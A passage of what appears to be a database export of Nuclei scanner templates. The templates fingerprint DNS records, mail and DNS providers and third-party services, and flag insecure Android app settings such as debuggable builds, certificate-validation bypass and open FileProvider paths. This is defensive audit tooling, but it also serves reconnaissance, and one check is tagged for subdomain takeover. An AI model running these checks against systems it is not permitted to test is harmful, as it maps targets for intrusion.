MX records direct emails to a mail exchange server.\n reference:\n - https://www.cloudflare.com/learning/dns/dns-records/dns-mx-record/\n - https://mxtoolbox.com/\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,mx\n\ndns:\n - name: \"{{FQDN}}\"\n type: MX\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tMX\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tMX\\t(.+)\"\n\n# digest: 4a0a0047304502205efe2d8fc4f39144631e42eaf8d4e45773974e43ff3d2db923203db6e044be4d022100c3fb0ba12d80ceff4ea27c45f1a3380ff6727b8a747803d3899a255fb2672f0f:922c64590222798bb761d5b6d8e72950\n", "hash": "3966d3e1a99da946dd6e158b2b3e73e6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9c" }, "name": "mx-service-detector.yaml", "content": "id: mx-service-detector\n\ninfo:\n name: Email Service Detector\n author: binaryfigments\n severity: info\n description: An email service was detected. Check the email service or spam filter that is used for a domain.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,service\n\ndns:\n - name: \"{{FQDN}}\"\n type: MX\n\n matchers-condition: or\n matchers:\n - type: word\n name: \"Office 365\"\n words:\n - \"mail.protection.outlook.com\"\n\n - type: word\n name: \"Google Apps\"\n words:\n - \"aspmx2.googlemail.com\"\n - \"aspmx3.googlemail.com\"\n - \"alt1.aspmx.l.google.com\"\n - \"alt2.aspmx.l.google.com\"\n - \"aspmx.l.google.com\"\n\n - type: word\n name: \"ProtonMail\"\n words:\n - \"mail.protonmail.ch\"\n - \"mailsec.protonmail.ch\"\n\n - type: word\n name: \"Zoho Mail\"\n words:\n - \"mx.zoho.eu\"\n - \"mx2.zoho.eu\"\n - \"mx3.zoho.eu\"\n\n - type: word\n name: \"ForcePoint Email Security\"\n words:\n - \"in.mailcontrol.com\"\n\n - type: word\n name: \"E-Zorg NL\"\n words:\n - \"spamfilter02.ezorg.nl\"\n - \"spamfilter01.ezorg.nl\"\n - \"spamfilter.ezorg.nl\"\n - \"spamfilter03.ezorg.nl\"\n\n - type: word\n name: \"Kerio 
Cloud EU\"\n words:\n - \"mx1.eu1.kerio.cloud\"\n - \"mx2.eu1.kerio.cloud\"\n\n - type: word\n name: \"Kerio Cloud US\"\n words:\n - \"mx1.us1.kerio.cloud\"\n - \"mx2.us1.kerio.cloud\"\n - \"mx3.us1.kerio.cloud\"\n\n - type: word\n name: \"Proofpoint EU\"\n words:\n - \"mx1-eu1.ppe-hosted.com\"\n - \"mx2-eu1.ppe-hosted.com\"\n\n - type: word\n name: \"Proofpoint US\"\n words:\n - \"mx1-us1.ppe-hosted.com\"\n - \"mx2-us1.ppe-hosted.com\"\n\n# digest: 4b0a0048304602210099a2fc7473ed27cd6def422387ade50932830f42a13a93928782b060f911f4bf0221009505a43f95011404d692365315d646406918c54d2829546a2312d4d67440ac0e:922c64590222798bb761d5b6d8e72950\n", "hash": "315dcff2b7d535857de98c98c83683ee", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9d" }, "name": "nameserver-fingerprint.yaml", "content": "id: nameserver-fingerprint\n\ninfo:\n name: NS Record Detection\n author: pdteam\n severity: info\n description: An NS record was detected. An NS record delegates a subdomain to a set of name servers.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,ns\n\ndns:\n - name: \"{{FQDN}}\"\n type: NS\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tNS\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tNS\\t(.+)\"\n\n# digest: 4a0a0047304502201ea440eb1f3de07432e12f94f89b2db94a960b7e41bf0a985db8454471217852022100ea06c3b9f829f1e4cbdd3e2ce32b039e0cf6150525202a42361133fb321794fc:922c64590222798bb761d5b6d8e72950\n", "hash": "d7a80a9f11447f0052e7925497fd5af1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9e" }, "name": "ptr-fingerprint.yaml", "content": "id: ptr-fingerprint\n\ninfo:\n name: PTR Detected\n author: pdteam\n severity: info\n description: A PTR record was detected. 
A PTR record maps an IP address back to a host name (reverse DNS); the returned name can reveal the hosting provider or an internal naming scheme.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,ptr\n\ndns:\n - name: \"{{FQDN}}\"\n type: PTR\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tPTR\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tPTR\\t(.+)\"\n\n# digest: 490a00463044022028a8f25e5f2d2d00e9aa403a801265be54f6889185388c416baef105d9b58193022011b971c138e5bf8e83bd52bc68b65f3c7ac9c81a43320629549465a1bc8be1d3:922c64590222798bb761d5b6d8e72950\n", "hash": "5254b2c9272fb4b072d8b77805f7dedc", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9f" }, "name": "servfail-refused-hosts.yaml", "content": "id: servfail-refused-hosts\n\ninfo:\n name: DNS Servfail Host Finder\n author: pdteam\n severity: info\n description: The resolver returned SERVFAIL or REFUSED for the host. Besides transient server or network errors, these responses for a delegated subdomain can indicate a lame or dangling NS delegation, where the delegated name servers no longer serve the zone, which is why the template is tagged takeover. Check the NS delegation and whether the delegated name server domain or its hosting zone can be claimed before treating this as a takeover.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,takeover\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n matchers:\n - type: word\n words:\n - \"SERVFAIL\"\n - \"REFUSED\"\n\n# digest: 4a0a0047304502201e4ab6d52233b5600ef7e9f54060934699002359838bd2802d602b642154ea1402210094809cea67fc9ad6c8a472142c8b3afb960c5e5cb3dfdd6708cb84f411a1790f:922c64590222798bb761d5b6d8e72950\n", "hash": "16f4266a7170c131b1d5a21b51a9df18", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca0" }, "name": "soa-detect.yaml", "content": "id: soa-detect\n\ninfo:\n name: SOA Record Service - Detection\n author: rxerium\n severity: info\n description: |\n Detects which DNS hosting provider a domain uses, based on the primary name server and hostmaster fields of its SOA record\n reference:\n - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/\n metadata:\n verified: true\n max-request: 1\n tags: dns,soa\n\ndns:\n - name: \"{{FQDN}}\"\n\n 
type: SOA\n\n matchers-condition: or\n matchers:\n - type: word\n name: \"cloudflare\"\n words:\n - \"dns.cloudflare.com\"\n\n - type: word\n name: \"amazon-web-services\"\n words:\n - \"awsdns\"\n\n - type: word\n name: \"akamai\"\n words:\n - \"hostmaster.akamai.com\"\n\n - type: word\n name: \"azure\"\n words:\n - \"azure-dns.com\"\n\n - type: word\n name: \"ns1\"\n words:\n - \"nsone.net\"\n\n - type: word\n name: \"verizon\"\n words:\n - \"verizon.com\"\n\n - type: word\n name: \"google-cloud-platform\"\n words:\n - \"googledomains.com\"\n - \"google.com\"\n\n - type: word\n name: \"alibaba\"\n words:\n - \"alibabadns.com\"\n\n - type: word\n name: \"safeway\"\n words:\n - \"safeway.com\"\n\n - type: word\n name: \"mark-monitor\"\n words:\n - \"markmonitor.com\"\n - \"markmonitor.zone\"\n\n - type: word\n name: \"hetznet\"\n words:\n - \"hetzner.com\"\n\n - type: word\n name: \"edge-cast\"\n words:\n - \"edgecastdns.net\"\n# digest: 4a0a0047304502207543d23b674d6f6af33197f11d534a088adecaa546feb4f674e59c3e17435c14022100ac553ae6b8aa7adc877bf3324accc71ae8801972775c0ed2961e076777d0b66c:922c64590222798bb761d5b6d8e72950", "hash": "1010c2f57d7d53816a790145f4851e37", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca1" }, "name": "spf-record-detect.yaml", "content": "id: spf-record-detect\n\ninfo:\n name: SPF Record - Detection\n author: rxerium\n severity: info\n description: |\n An SPF TXT record was detected\n reference:\n - https://www.mimecast.com/content/how-to-create-an-spf-txt-record\n metadata:\n max-request: 1\n tags: dns,spf\ndns:\n - name: \"{{FQDN}}\"\n type: TXT\n matchers:\n - type: word\n words:\n - \"v=spf1\"\n\n extractors:\n - type: regex\n regex:\n - \"v=spf1(.+)\"\n# digest: 4b0a00483046022100e0f6a26cc45857637d83de49ed369272f053c612baef9673f5193256fda98135022100ac6d435df18fdcfdbad52417c38d2dcbff9a58cd2217ba3a66a214fa400ec72b:922c64590222798bb761d5b6d8e72950", "hash": "09caf585594530b9ed9147751fbde9fc", "level": 
2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca2" }, "name": "spoofable-spf-records-ptr.yaml", "content": "id: spoofable-spf-records-ptr\n\ninfo:\n name: Spoofable SPF Records with PTR Mechanism\n author: binaryfigments\n severity: info\n description: The SPF record uses the ptr mechanism, which RFC 7208 (section 5.5) deprecates because it is slow, unreliable and may be skipped by receivers, so the record cannot be relied on to reject spoofed senders. Replace ptr with explicit ip4, ip6, a, mx or include mechanisms. Note that the matcher only catches a ptr token surrounded by spaces and will miss ptr at the end of the record or the ptr:domain form.\n reference:\n - https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,spf\n\ndns:\n - name: \"{{FQDN}}\"\n type: TXT\n matchers:\n - type: word\n words:\n - \"v=spf1\"\n - \" ptr \"\n condition: and\n\n# digest: 4a0a00473045022100dcb965b47233e3942f4879e832d145cc6ade3ddc990891e0ff365e8209a6aa8302201ecdb55e85d79a9c4e2d585fd8ce7b83e7549fb3bc257be05038e166b73ec1a6:922c64590222798bb761d5b6d8e72950\n", "hash": "873b15c67321fa1fc3c1248fd8f09e33", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca3" }, "name": "txt-fingerprint.yaml", "content": "id: txt-fingerprint\n\ninfo:\n name: DNS TXT Record Detected\n author: pdteam\n severity: info\n description: A DNS TXT record was detected. 
TXT records hold free-form text and are commonly used to publish SPF, DKIM and DMARC policies and third-party domain-verification tokens, so their contents can reveal which services a domain uses.\n reference:\n - https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,txt\n\ndns:\n - name: \"{{FQDN}}\"\n type: TXT\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tTXT\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tTXT\\t(.+)\"\n\n# digest: 4b0a00483046022100e4559c121d9f67b4f8ae256bc1310808d8b5223de95617f4043356431e9d65e50221008b74ba8f34d3497f956434868c133d05dfe8408acdcfa3480f7cd64284dee17a:922c64590222798bb761d5b6d8e72950\n", "hash": "2022459dcc9acf1f7fe0cf74ebd779ff", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca4" }, "name": "txt-service-detect.yaml", "content": "id: txt-service-detect\n\ninfo:\n name: DNS TXT Service - Detect\n author: rxerium\n severity: info\n description: |\n Identifies third-party services a domain uses from the domain-verification tokens published in its TXT records.\n reference:\n - https://www.abenezer.ca/blog/services-companies-use-txt-records\n metadata:\n verified: true\n max-request: 1\n tags: dns,txt\n\ndns:\n - name: \"{{FQDN}}\"\n type: TXT\n\n matchers-condition: or\n matchers:\n - type: word\n name: \"keybase\"\n words:\n - \"keybase-site-verification\"\n\n - type: word\n name: \"proton-mail\"\n words:\n - \"protonmail-verification\"\n\n - type: word\n name: \"webex\"\n words:\n - \"webexdomainverification\"\n\n - type: word\n name: \"apple\"\n words:\n - \"apple-domain-verification\"\n\n - type: word\n name: \"facebook\"\n words:\n - \"facebook-domain-verification\"\n\n - type: word\n name: \"autodesk\"\n words:\n - \"autodesk-domain-verification\"\n\n - type: word\n name: \"stripe\"\n words:\n - \"stripe-verification\"\n\n - type: word\n name: \"atlassian\"\n words:\n - \"atlassian-domain-verification\"\n\n - type: word\n name: \"adobe-sign\"\n words:\n - 
\"adobe-sign-verification\"\n\n - type: word\n name: \"zoho\"\n words:\n - \"zoho-verification\"\n\n - type: word\n name: \"have-i-been-pwned\"\n words:\n - \"have-i-been-pwned-verification\"\n\n - type: word\n name: \"knowbe4\"\n words:\n - \"knowbe4-site-verification\"\n\n - type: word\n name: \"jamf\"\n words:\n - \"jamf-site-verification\"\n\n - type: word\n name: \"parallels\"\n words:\n - \"parallels-domain-verification\"\n\n - type: word\n name: \"dropbox\"\n words:\n - \"dropbox-domain-verification\"\n\n - type: word\n name: \"vmware-cloud\"\n words:\n - \"vmware-cloud-verification\"\n\n - type: word\n name: \"canva\"\n words:\n - \"canva-site-verification\"\n\n - type: word\n name: \"mongodb\"\n words:\n - \"mongodb-site-verification\"\n\n - type: word\n name: \"slack\"\n words:\n - \"slack-domain-verification\"\n\n - type: word\n name: \"teamViewer\"\n words:\n - \"teamviewer-sso-verification\"\n\n - type: word\n name: \"bugcrowd\"\n words:\n - \"bugcrowd-verification\"\n\n - type: word\n name: \"cisco\"\n words:\n - \"cisco-site-verification\"\n\n - type: word\n name: \"palo-alto-networks\"\n words:\n - \"paloaltonetworks-site-verification\"\n\n - type: word\n name: \"twilio\"\n words:\n - \"twilio-domain-verification\"\n\n - type: word\n name: \"dell-technologies\"\n words:\n - \"dell-technologies-domain-verification\"\n\n - type: word\n name: \"1password\"\n words:\n - \"1password-site-verification\"\n\n - type: word\n name: \"duo\"\n words:\n - \"duo_sso_verification\"\n\n - type: word\n name: \"sophos\"\n words:\n - \"sophos-domain-verification\"\n\n - type: word\n name: \"pinterest\"\n words:\n - \"pinterest-site-verification\"\n\n - type: word\n name: \"citrix\"\n words:\n - \"citrix-verification-code\"\n\n - type: word\n name: \"zapier\"\n words:\n - \"zapier-domain-verification-challenge\"\n\n - type: word\n name: \"uber\"\n words:\n - \"uber-domain-verification\"\n\n - type: word\n name: \"zoom\"\n words:\n - \"zoom-domain-verification\"\n\n - 
type: word\n name: \"lastpass\"\n words:\n - \"lastpass-verification-code\"\n\n - type: word\n name: \"google-workspace\"\n words:\n - \"google-site-verification\"\n\n - type: word\n name: \"flexera\"\n words:\n - \"flexera-domain-verification\"\n\n - type: word\n name: \"yandex\"\n words:\n - \"yandex-verification\"\n\n - type: word\n name: \"calendly\"\n words:\n - \"calendly-site-verification\"\n\n - type: word\n name: \"docusign\"\n words:\n - \"docusign\"\n\n - type: word\n name: \"whimsical\"\n words:\n - \"whimsical\"\n# digest: 4a0a00473045022100b1a2ab86bb10ef6a55eaa2a6ec8a5adc22a05f003de6e5f6ef884921c4a66e12022054a8c73bec1723fa0637e65cf405f5a5091f6f257d743962dca0691ac639ce2a:922c64590222798bb761d5b6d8e72950", "hash": "ac09fd0634a7cebb2edcd44c101b5304", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca5" }, "name": "worksites-detection.yaml", "content": "id: detect-worksites\n\ninfo:\n name: Worksites.net Service Detection\n author: melbadry9\n severity: info\n description: A worksites.net service was detected.\n reference:\n - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,service\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n matchers:\n - type: word\n words:\n - \"69.164.223.206\"\n\n# digest: 4a0a0047304502205f67d327d32f1d0c1060ed655d0fa32415cd9c82a90d37b6edd56c72c001e3d9022100a3955a69d030743492077d921ae562a00dce69a8def4abad33b18f0a982a8a0e:922c64590222798bb761d5b6d8e72950\n", "hash": "d1a93a6fd86dac6ca2bd884b8b6d2c0f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca6" }, "name": "adb-backup-enabled.yaml", "content": "id: adb-backup-enabled\n\ninfo:\n name: ADB Backup Enabled\n author: gaurang\n severity: low\n description: ADB Backup is enabled, which allows the backup and restore of an app's private data.\n remediation: Ensure proper access or disable completely.\n reference:\n - 
https://adb-backup.com/\n classification:\n cwe-id: CWE-200\n tags: android,file,adb\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"android:allowBackup=\\\"true\\\"\"\n# digest: 4a0a00473045022100efd6e8093a922583aa94e11240ba3c3fb79aa141ced3c67e7b534b376fc42f45022003b0f537ff8b6454419a0e21321004215151a906dcb13a3144f0514d0a595658:922c64590222798bb761d5b6d8e72950", "hash": "6570d9de26cb87640634be3475201d14", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca7" }, "name": "biometric-detect.yaml", "content": "id: biometric-detect\n\ninfo:\n name: Android Biometric/Fingerprint - Detect\n author: gaurang\n severity: info\n description: The app declares the USE_FINGERPRINT or USE_BIOMETRIC permission, indicating that it uses biometric authentication; review how the authentication result is enforced.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file,biometric\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"android.permission.USE_FINGERPRINT\"\n - \"android.permission.USE_BIOMETRIC\"\n\n# Enhanced by md on 2023/05/02\n# digest: 490a0046304402201effa64fdef8e198849c4be2acf87c6be5c4efed84e9d5bb9d66f5df3db60b5d02200c7003f9a4e737c6fc6cf7137ec2184a7c9f79ed6e3abe97f4c2a02ec90b437e:922c64590222798bb761d5b6d8e72950", "hash": "525acfc0b1d44ecdb39492d05755d68d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca8" }, "name": "certificate-validation.yaml", "content": "id: improper-certificate-validation\n\ninfo:\n name: Android Improper Certificate Validation - Detect\n author: gaurang\n severity: medium\n description: A call to SslErrorHandler.proceed() was detected. Calling proceed() from a WebViewClient's onReceivedSslError callback tells the WebView to keep loading despite a TLS certificate error, which effectively disables certificate validation for that WebView and exposes its traffic to man-in-the-middle attacks. Confirm that the call is not limited to a legitimate, narrowly scoped case before reporting.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"Landroid/webkit/SslErrorHandler;->proceed()V\"\n# digest: 
4a0a004730450220641d6e69fc91755ec4dbe940f170858c07c11f7662b3517e5636fc16ee47215e022100de151b50e70241e3c3673f8a482928542ad8791b2b16c54b87b2225ffca7ef5b:922c64590222798bb761d5b6d8e72950", "hash": "9c806f8864b58eb520412bcb1793ff45", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ca9" }, "name": "content-scheme.yaml", "content": "id: content-scheme\n\ninfo:\n name: Android Content Scheme - Detect\n author: gaurang\n severity: info\n description: An intent filter in the manifest declares android:scheme with the value content, so the component accepts content URIs from other apps; verify that the receiving component validates the URI before opening it.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - xml\n matchers:\n - type: word\n words:\n - \"android:scheme=\\\"content\\\"\"\n# digest: 4b0a00483046022100c2c3c725fa7b2730a2a97a411041023f26e69c0a799b4e8de850bdac3946b620022100cb36d81a813131983cdce4a0b9ef5eb94c6278ed4c5a9f862bb347fbfad5a0fa:922c64590222798bb761d5b6d8e72950", "hash": "c49dbe38e7545d7f23d4cf881f7dc061", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307caa" }, "name": "debug-enabled.yaml", "content": "id: android-debug-enabled\n\ninfo:\n name: Android Debug Enabled\n author: gaurang\n severity: low\n description: The manifest sets android:debuggable to true. A debuggable build lets anyone with adb access attach a debugger, run code as the app's UID and read its private data, so this flag must not be set in release builds.\n tags: android,file\n\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"android:debuggable=\\\"true\\\"\"\n# digest: 4a0a00473045022036652150abcc863fe683d75f6ef4ed133b21a536c30fa521bccde3e54da770d802210098c054b0d8e64528d1cd18755e42123fc045ca80522a19ba7ee6bbb93d59d817:922c64590222798bb761d5b6d8e72950", "hash": "edf55efb0e1fa80592bfb599d195491a", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cab" }, "name": "deep-link-detect.yaml", "content": "id: deep-link-detect\n\ninfo:\n name: Android Deep Link - Detect\n author: Hardik-Solanki\n severity: info\n description: Android deep link functionality was detected.\n reference:\n - 
https://developer.android.com/training/app-links/deep-linking\n - https://www.geeksforgeeks.org/deep-linking-in-android-with-example/\n - https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: android,file,deeplink\n\nfile:\n - extensions:\n - xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"android:scheme\"\n - \"android:host\"\n - \"android:name\"\n condition: and\n\n# Enhanced by md on 2023/05/02\n# digest: 4b0a00483046022100a95d3d2fdeae1df7454ddd0f0ea7f10bbd8edb608c502695f7b6cf66b9415790022100f86fce7ae52479b32a1c4374965476a799a95f8e9fcd0926b35649ba022eacd0:922c64590222798bb761d5b6d8e72950", "hash": "6306c70f8fcb828a9befbe27b3b83d60", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cac" }, "name": "dynamic-broadcast-receiver.yaml", "content": "id: dynamic-registered-broadcast-receiver\n\ninfo:\n name: Android Dynamic Broadcast Receiver Register - Detect\n author: gaurang\n severity: info\n description: Android dynamic broadcast receiver register functionality was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)\"\n# digest: 4a0a00473045022100aa618eba1f07180c9ed91a94c26f3eaa3104134311b4c7c52567ec235f73e01f02204b8920dc1a170a1e7843abc4562c5a453248be604442c0b50ebc0690d1a4c90a:922c64590222798bb761d5b6d8e72950", "hash": "096e3b2d21bb9ec968452c65066e6396", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cad" }, "name": "file-scheme.yaml", "content": "id: file-scheme\n\ninfo:\n name: Android File Scheme - Detect\n author: gaurang\n severity: info\n 
description: An intent filter in the manifest declares android:scheme with the value file, so the component accepts file URIs from other apps; review how the referenced file is opened and whether the path is validated.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - xml\n matchers:\n - type: word\n words:\n - \"android:scheme=\\\"file\\\"\"\n\n# Enhanced by md on 2023/05/03\n# digest: 4b0a00483046022100af4a17caa84888f0caecdc441156d030d844f3839f37936b3d8689a8a7d1aaad0221009c00d9b0ab3ce7efa0ba61485569a0df903a3783c0748289aa4c384ec0896465:922c64590222798bb761d5b6d8e72950", "hash": "4c06c094afea818dcfda3e16ba3e1c8b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cae" }, "name": "google-storage-bucket.yaml", "content": "id: google-storage-bucket\n\ninfo:\n name: Google Storage Bucket - Detection\n author: Thabisocn\n severity: info\n metadata:\n verified: \"true\"\n github-query: \"/[a-z0-9.-]+\\\\.appspot\\\\.com/\"\n tags: file,android,google\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[a-z0-9.-]+\\\\.appspot\\\\.com\"\n# digest: 4a0a004730450221008d65b2c2642e1ab203ccf7f0a1227352ca7da9f7daf46d085b9dc5ebf0994721022074fba51478f8e72d2bd15ca78b40d7022715cd02124e33a1cf76db1ec0ab838d:922c64590222798bb761d5b6d8e72950", "hash": "57cb9c946f4285951194ae5f27e970c5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307caf" }, "name": "provider-path.yaml", "content": "id: insecure-provider-path\n\ninfo:\n name: Android Insecure Provider Path - Detect\n author: gaurang\n severity: medium\n description: A FileProvider path configuration declares a root-path element whose path is a single dot or empty. root-path is resolved against the device root directory, so such an entry lets a content URI from this provider reach any file the app itself can read, including its private storage, instead of a restricted subdirectory. Limit the shared path to the directory that actually needs to be exposed.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: android,file\n\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"root-path name=\\\"[0-9A-Za-z\\\\-_]{1,10}\\\" path=\\\".\\\"\"\n - \"root-path name=\\\"[0-9A-Za-z\\\\-_]{1,10}\\\" path=\\\"\\\"\"\n# digest: 
490a0046304402206c94650aa17a95f664a3b02618c0aaf5935a8140b515903041ea94574cf1548d02203fcc98c6c0d286b2ebec48a54955e783d285ca26837e63c869000d48907d03f5:922c64590222798bb761d5b6d8e72950", "hash": "72cb56aada489cae43794c4cd428e594", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb0" }, "name": "webview-addjavascript-interface.yaml", "content": "id: webview-addjavascript-interface\n\ninfo:\n name: Android WebView Add Javascript Interface - Detect\n author: gaurang\n severity: info\n description: Android WebView Add Javascript interface usage was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: android,file,webview\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V\"\n\n# Enhanced by md on 2023/05/02\n# digest: 4a0a00473045022017350c5e7005e173cb17ad1178c2d04297ca669e7911c3aa35ab14e38b4dd63a02210087c5e48401c75a4f6be45c77cdfa376651c0c082a8c204ce021f6fca5c008369:922c64590222798bb761d5b6d8e72950", "hash": "be6e883a6752f1f9d316eb4bb772348d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb1" }, "name": "webview-javascript.yaml", "content": "id: webview-javascript-enabled\n\ninfo:\n name: WebView JavaScript - Detect\n author: gaurang\n severity: info\n description: WebView Javascript enabling was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file,js,webview\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V\"\n# digest: 4a0a00473045022100eeec2d42663cc7c3ba34fa2ae0fba3d4f9e75512967a520a3cd681061476702b02202489b8e69fa532c77c282d7702053492103e9f643863885b397bec5197c7ee6b:922c64590222798bb761d5b6d8e72950", "hash": "4dfd6e13a08507227c4a3503fbbc5af9", "level": 2, 
"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb2" }, "name": "webview-load-url.yaml", "content": "id: webview-load-url\n\ninfo:\n name: WebView loadUrl - Detect\n author: gaurang\n severity: info\n description: A call to WebView.loadUrl(String) was detected; check whether the URL can be influenced by untrusted input such as an intent extra or a deep link.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: android,file,webview\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V\"\n\n# Enhanced by md on 2023/05/02\n# digest: 4b0a00483046022100d61e6bcd00f5e0afaa1969aed4daca70e51186005b245ecb509f3bff3aec9e72022100c0e219ac8ba638bed9f5e01d2f2accf82b2bc8ef612ff3ba220c1f2eeb65dc5e:922c64590222798bb761d5b6d8e72950", "hash": "6e51de7e4e6e3d6315ef0560b0e10264", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cb3" }, "name": "webview-universal-access.yaml", "content": "id: webview-universal-access\n\ninfo:\n name: Android WebView Universal Access - Detect\n author: gaurang\n severity: medium\n description: A call to WebSettings.setAllowUniversalAccessFromFileURLs was detected. When the flag is set to true, JavaScript loaded from a file URL may read content from any origin, bypassing the same-origin policy and allowing a malicious page rendered in the WebView to exfiltrate local files. The matcher only identifies the call, not its argument, so confirm that true is passed before reporting.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: android,file,webview\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V\"\n# digest: 